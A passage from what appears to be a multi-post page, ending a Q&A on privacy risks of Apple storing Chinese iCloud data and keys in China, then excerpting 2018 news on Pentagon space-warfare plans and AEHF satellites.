Furthermore, China’s Cyber Security Law requires network operators to provide “technical support and assistance” to law enforcement and state security agents. That means that when the authorities come to GCBD requesting information about an iCloud user for the purposes of a criminal investigation, the company has a legal obligation to provide it and few, if any, viable legal avenues to challenge or refuse the request.

  3. Apple says it has control over encryption keys and that it won’t allow backdoors. Won’t that protect users in China?

It all depends on the circumstances under which the company will allow GCBD – and the Chinese authorities – access to intelligible decrypted data on iCloud users. When users accept the terms of service for iCloud in China, they agree to allow their information and content to be turned over to law enforcement “if legally required to do so”. Significantly, from now on Apple will store the encryption keys for Chinese users in China, not in the US – making it all but inevitable that the company will be forced to hand over decrypted data so long as the request complies with Chinese law.

Given that many provisions of Chinese law offer inadequate protection to privacy, freedom of expression and other rights, simply checking whether government information requests comply with Chinese law doesn’t address whether complying with the request might contribute to human rights violations. Apple hasn’t confirmed whether or how it will assess whether government information requests might violate users’ human rights. We won’t really know how Apple will respond until it’s put to the test, and unfortunately that’s probably just a matter of time.

As for “backdoors”, or technical measures that would allow law enforcement or other government agencies to access unencrypted user data without having to ask for it, Apple’s commitment to prevent their use is admirable. But the commitment is meaningless if law enforcement can get the companies to decrypt user information simply by saying that it is for a criminal investigation.

  4. What should iCloud users inside China do to protect themselves?

The best way to protect your personal information from being accessed by the Chinese government is to avoid storing it on servers inside China. Users with a credit card and billing address outside China can use those to register their accounts and keep storing their iCloud data outside China. Otherwise, the only option available to Chinese users is to delete their iCloud accounts and permanently opt out of the service. (Apple has provided instructions for how to do so here.) Individual users should seriously consider the risks involved and come to their own decision, but Apple should protect Chinese users by switching iCloud off by default and giving users very clear warnings about the risks they may face by opting in to the service.

  5. How can ICT companies act responsibly when operating in China?

Companies have a responsibility to respect all human rights wherever they operate in the world. Users of their products and services need to be given clear and specific information about risks they might face to their privacy and freedom of expression in China, and what action the company is taking in response. Companies should carry out regular and verifiable human rights impact assessments and demonstrate publicly that they have oversight, due diligence and accountability measures in place to ensure respect for human rights. Finally, companies should do everything they can to influence the Chinese government to protect and respect human rights and speak up and challenge government actions when they threaten human rights. If a company finds that it is unable to mitigate the high risk of human rights violations, it may be forced to decide not to operate in China.

Apple’s official website declares: “At Apple, we believe privacy is a fundamental human right.” It remains to be seen whether Apple can put its words into action.

Space Warfare, the New Battlefield

Primer: The Pentagon is considering creating a combatant command for space warfare, the latest step by the Defense Department to respond to Chinese and Russian militarization high above Earth.

The move — one of several under consideration — is mentioned in a new Pentagon report sent to Congress last week. Right now, space forces are dispersed throughout the military and intelligence community.

There are two kinds of combatant commands. Geographic cocoms oversee military operations in six regions of the world. Functional ones — like U.S. Strategic Command and U.S. Transportation Command — oversee operations that span multiple geographical commands. U.S. Cyber Command is considered a subunified command under STRATCOM, but is being elevated to a functional command.

The Pentagon is looking into whether space should have its own combatant command or subunified command (like Cyber Command), the report says. Space forces were grouped under U.S. Space Command, a unified combatant command, until 2002.

***

The Pentagon is preparing for war should China, Russia, or other adversaries attack vital American satellites and other space systems, a senior Pentagon official told Congress on Wednesday.

The Pentagon has requested $12.5 billion in funding for the fiscal year 2019 that begins Oct. 1 for building up what he termed a “more resilient defendable space architecture.”

The request is $1.1 billion more than funding for last year on military space.

Rood, and Air Force Gen. John Hyten, commander of the Omaha-based Strategic Command, testified on the command’s budget request of $24 billion.

Neither elaborated on what space warfare capabilities are being developed. The Pentagon also has not said how it would deter and defend satellites from attack.

Space defense so far has involved development of intelligence capabilities to identify and assess if an incident in space is an attack, or the result of a malfunction or disruption due to collision with space debris.

Military space “resilience” also calls for the Pentagon to rapidly replace or restore satellites after attacks or other disruptions.

The Pentagon’s Defense Science Board, in a report last year, warned that the vulnerability of U.S. satellites to electronic attack was “a crisis to be dealt with immediately.”

The Joint Staff intelligence directorate warned earlier this year that China and Russia will have fully developed space attack weapons in place by 2020 that will threaten all U.S. satellites in low earth orbit—100 miles to 1,200 miles in space.

“Space is a warfighting domain just like the air, ground, maritime, and cyberspace domains,” Hyten said.

Currently, a defense and intelligence center called the National Space Defense Center, located at Schriever Air Force Base, Colorado, runs 24-hour operations for rapid detection, warning, and defense from space attacks.

War games involving space war also are held regularly with U.S. military forces and allies, including Asian and European allies.

China has conducted at least seven tests of hypersonic vehicles, and Russia has also conducted several hypersonic missile tests.

The hypersonic vehicles are designed to defeat missile defenses. More here.

***

February 2018: The Pentagon put Advanced Extremely High Frequency satellites in orbit to ensure communication in the event of a nuclear attack. But those spacecraft could also play a role in the rapid militarization of space.

  • Advanced Extremely High Frequency (AEHF) satellites will be able to keep the U.S. military in communication even after a nuclear attack.
  • They’re also more resistant to electronic jamming, which is a growing concern as tensions with China and Russia heat up.
  • In the war of the future, nations may try to physically destroy other nations’ satellites to disrupt communications and navigation.

Your phone is not going to work on the day nuclear war starts. But the U.S. President, National Security Council, and combat commanders count on being able to communicate. This doomsday connection relies on what we call Advanced Extremely High Frequency (AEHF) satellites that sit in geostationary orbit.

“We need systems that work on the worst day in the history of the world,” says Todd Harrison, director of the Aerospace Security Project at the Center for Strategic and International Studies.

There are four AEHF sats in orbit today. The proposed 2019 U.S. Air Force budget shows about $29.8 million in funding to complete two more, which would launch in 2019 and 2020. Air Force staffers say more money has been set aside in 2019 to ready the software and databases for the pair of new sats.

The Air Force talks about the AEHF satellites as part of its new focus on modernizing America’s nuclear abilities. “We must concurrently modernize the entire nuclear triad and the command and control systems that enable its effectiveness,” says Air Force Secretary Heather Wilson. The Trump administration has its eye on nuclear weapons, but these satellites also sit at the nexus of another big defense trend: Space warfare.

The Department of Defense is also investing in new jam-resistant GPS satellites. It is pouring money into future satellite programs, including AEHF, to the tune of $677 million for research and development in 2019. As orbital threats grow, new potential users—especially the U.S. Army—are taking interest in what the doomsday spacecraft can do. Preparing for post-apocalyptic communication may be just the beginning. More here.